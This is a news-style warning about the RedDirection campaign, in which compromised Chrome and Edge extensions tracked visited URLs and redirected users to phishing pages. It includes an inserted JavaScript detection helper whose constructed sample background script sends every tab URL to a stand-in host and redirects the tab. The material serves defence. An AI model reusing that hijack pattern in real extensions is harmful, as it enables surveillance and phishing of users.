Beware the RedDirection Malware: Over 2.3 Million Google Chrome and Microsoft Edge Users Affected!

A new and alarming malware campaign, dubbed RedDirection, has compromised the browsers of over 2.3 million Google Chrome and Microsoft Edge users through a set of deceptive browser extensions. The campaign was uncovered by researchers at Koi Security.

At first glance, these extensions appeared completely legitimate. They boasted Google’s verified badge, garnered thousands of downloads, received glowing reviews, and were prominently featured in official stores. However, unbeknownst to users, they transformed browsers into covert surveillance tools.

The investigation began with an extension named Color Picker, Eyedropper — Geco colorpick, which had functioned normally for years before a seemingly innocuous update turned it malicious.


Color Picker, Eyedropper – A Deceptively Dangerous Extension

Upon investigating the extension’s command-and-control infrastructure, researchers discovered it was only one component of a much larger operation. In total, 18 extensions were involved, including emoji keyboards, video speed controllers, VPNs for Discord and TikTok, dark themes, and volume boosters, all carrying the same malicious code.

Each extension operated under its own distinct domain, creating the illusion of unique developers. However, they were all interconnected through a centralized attack infrastructure that targeted both Chrome and Edge browsers.

Whenever a user opens a tab or navigates to a page, these extensions capture the page URL and transmit it to a remote server together with a unique per-install tracking ID. The server can then redirect the user to a fraudulent site. The malicious code resides in the extension’s background service worker, where it runs silently and fires on every tabs.onUpdated event.
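The following is an added example, not code from the Koi Security report or from any of the extensions named on this page. It is a small static-triage helper for an unpacked Chrome or Edge extension that flags the behaviour chain just described: a background service worker that hooks tabs.onUpdated, reads the tab URL, sends it off-host, and redirects the tab. The two sample extensions, their manifests, the file name bg.js and the hostname example-c2.invalid are all constructed for the demonstration.

```javascript
// Added example (not the report's or any real extension's code): static triage of an
// unpacked extension for the URL-exfiltration-and-redirect pattern described above.
// Sample manifests, sources and the hostname example-c2.invalid are constructed.

const SUSPICIOUS_PATTERNS = [
  { name: "tabs.onUpdated hook", re: /tabs\.onUpdated\.addListener/ },
  { name: "reads tab URL", re: /\b(tab|changeInfo)\.url\b/ },
  { name: "outbound fetch/XHR", re: /\b(fetch|XMLHttpRequest)\s*\(/ },
  { name: "redirects the tab", re: /tabs\.update\s*\([^)]*\burl\s*:/ },
  { name: "persistent tracking id", re: /storage\.(local|sync)\.(get|set)\s*\(/ },
];

// All four together are the hijack chain; two or more are worth a manual look.
const HIJACK_CHAIN = ["tabs.onUpdated hook", "reads tab URL", "outbound fetch/XHR", "redirects the tab"];

// Manifest V3 declares background.service_worker; V2 used background.scripts.
function backgroundFiles(manifest) {
  const bg = manifest.background || {};
  if (typeof bg.service_worker === "string") return [bg.service_worker];
  if (Array.isArray(bg.scripts)) return bg.scripts;
  return [];
}

// manifest: parsed manifest.json; files: { filename: source } read from the unpacked extension.
function triageExtension(manifest, files) {
  const findings = [];
  const perms = new Set([...(manifest.permissions || []), ...(manifest.host_permissions || [])]);
  // Reading tab.url inside onUpdated needs the "tabs" permission or a matching host permission.
  if (perms.has("tabs")) findings.push("manifest: 'tabs' permission (can read every tab's URL)");
  if (perms.has("<all_urls>")) findings.push("manifest: <all_urls> host permission");

  const hits = new Set();
  const hosts = new Set();
  for (const file of backgroundFiles(manifest)) {
    const src = files[file] || "";
    for (const p of SUSPICIOUS_PATTERNS) {
      if (p.re.test(src)) {
        hits.add(p.name);
        findings.push(`${file}: ${p.name}`);
      }
    }
    // Literal URLs in the background script are candidate C2 hosts to compare with the IOC list.
    for (const m of src.matchAll(/https?:\/\/([^/"'`\s]+)/g)) hosts.add(m[1]);
  }

  const matched = HIJACK_CHAIN.filter((n) => hits.has(n)).length;
  const risk = matched === HIJACK_CHAIN.length ? "high" : matched >= 2 ? "medium" : "low";
  return { risk, findings, remoteHosts: [...hosts].sort() };
}

// Constructed sample 1: the shape of the hijack described in the article.
const HIJACK_MANIFEST = {
  manifest_version: 3, name: "Color Picker (constructed sample)", version: "2.0.0",
  permissions: ["tabs", "storage"], host_permissions: ["<all_urls>"],
  background: { service_worker: "bg.js" },
};
const HIJACK_BACKGROUND = `
const C2 = "https://example-c2.invalid/track";   // constructed hostname
chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete" || !tab.url) return;
  const { uid } = await chrome.storage.local.get("uid");      // per-install tracking id
  const res = await fetch(C2, { method: "POST", body: JSON.stringify({ uid, url: tab.url }) });
  const { redirect } = await res.json();
  if (redirect) chrome.tabs.update(tabId, { url: redirect }); // server-chosen destination
});
`;

// Constructed sample 2: a colour picker whose worker only talks to its own popup.
const BENIGN_MANIFEST = {
  manifest_version: 3, name: "Color Picker (constructed sample)", version: "1.9.3",
  permissions: ["activeTab"], background: { service_worker: "bg.js" },
};
const BENIGN_BACKGROUND = `
chrome.runtime.onMessage.addListener((msg, sender, sendResponse) => {
  if (msg.type === "pick") sendResponse({ color: msg.color.toUpperCase() });
});
`;

for (const [m, src] of [[HIJACK_MANIFEST, HIJACK_BACKGROUND], [BENIGN_MANIFEST, BENIGN_BACKGROUND]]) {
  console.log(m.name, m.version, JSON.stringify(triageExtension(m, { "bg.js": src }), null, 2));
}
```

To triage a real installed extension, read manifest.json and the background files it references from the unpacked copy under the browser profile (for Chrome, the Default/Extensions/<id>/<version>_0/ directory; Edge uses the same layout under its own profile folder) and compare remoteHosts against the domains in the Koi Security IOC list. This is a string-matching heuristic: minified or obfuscated code can hide the API calls, so a "low" result means "nothing obvious", not "clean".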

These redirects could lead users to counterfeit Zoom pages prompting them to download a “critical update”, to installers that drop further malware, or, in the case of some extensions, to phishing pages masquerading as legitimate bank websites.

One of the most concerning aspects of this campaign is that the extensions were not malicious from the outset. Many had been trusted and functional for years until malware was stealthily introduced through subsequent version updates, often without user notification. As Google and Microsoft’s extension platforms automatically update extensions, most users remained oblivious to the transformation of their browsers into tools for tracking and redirection.

Extensions implicated in the RedDirection campaign include:

  • Color Picker, Eyedropper — Geco colorpick
  • Video Speed Controller
  • Unlock Discord
  • Dark Theme
  • Volume Max
  • Emoji Keyboard Online
  • Free Weather Forecast
  • Unlock YouTube VPN
  • SearchGPT – ChatGPT for Search
  • YouTube Unblocked
  • Web Sound Equalizer
  • Flash Player Emulator

Each of these extensions provided seemingly useful features while simultaneously embedding covert hijacking code.

For a detailed list of compromised extension IDs and domains associated with this malware, check out the Koi Security report.

If you have any of these extensions installed, it is crucial to remove them immediately and clear your browser history and site data. Additionally, running a comprehensive malware scan and reviewing all your extensions is highly recommended. Koi Security has also provided Indicators of Compromise (IOCs) to help detect this malware, including extension IDs and malicious server domains.

This campaign underscores a significant weakness in how browser extension marketplaces operate. RedDirection is more than just another cyber-attack; it is a supply-chain-level breach in which the trust signals designed to protect users (verified badges, download counts, reviews, store placement) were themselves exploited. Over 2.3 million users have unwittingly been tracked, redirected, or exposed to attacks simply by installing what appeared to be trusted browser tools.